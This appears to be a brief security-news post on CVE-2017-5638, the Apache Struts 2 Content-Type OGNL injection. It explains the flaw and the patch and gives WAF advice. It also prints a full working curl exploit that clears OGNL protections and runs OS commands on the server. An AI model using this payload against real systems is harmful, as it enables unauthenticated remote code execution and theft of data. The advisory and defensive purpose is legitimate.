Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent with an HTTP request to a Struts-based application. Improper exception handling during file upload attempts allows an attacker to inject Object-Graph Navigation Language (OGNL) expressions within the header. The framework incorrectly evaluates these expressions, leading to the execution of arbitrary system commands on the server with the application’s privileges. This provides a direct vector for complete server compromise without requiring authentication, making it a severe remote code execution vulnerability.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-20
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://vulnerable-server.com/struts2-showcase/fileupload/doUpload.action
How Exploit:
Attacker crafts a malicious HTTP request with a corrupted `Content-Type` header containing an OGNL expression. The server-side parser fails to handle the header correctly, causing an exception. During exception handling, the injected OGNL expression is evaluated by the Struts framework, executing the embedded system commands on the target server with the application’s privileges.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1. Apply vendor patch immediately. Implement WAF rules to filter malicious `Content-Type` headers. Isolate application servers from sensitive internal networks.
Impact:
Complete system compromise. Unauthorized remote code execution. Theft of sensitive data. Full control over the affected server. Potential pivot point into internal network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
